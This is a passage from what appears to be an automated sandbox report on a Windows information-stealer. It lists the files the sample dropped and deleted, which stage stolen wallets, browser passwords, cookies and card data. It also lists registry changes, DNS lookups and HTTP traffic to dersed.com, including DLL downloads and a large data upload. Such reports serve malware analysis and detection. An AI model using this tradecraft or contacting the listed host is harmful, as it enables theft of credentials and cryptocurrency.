- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\Device\\LanmanDatagramReceiver",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A\\data"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "dersed.com",
- "answers":
- "data": "104.200.67.209",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- * Domains:
- "ip": "104.200.67.209",
- "domain": "dersed.com"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://dersed.com/288",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/288",
- "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/freebl3.dll",
- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 2,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40452\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "72.11.140.50",
- "inaddrarpa": "",
- "hostname": "ip-api.com"
- "country_name": "United States",
- "ip": "104.200.67.209",
- "inaddrarpa": "",
- "hostname": "dersed.com"
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement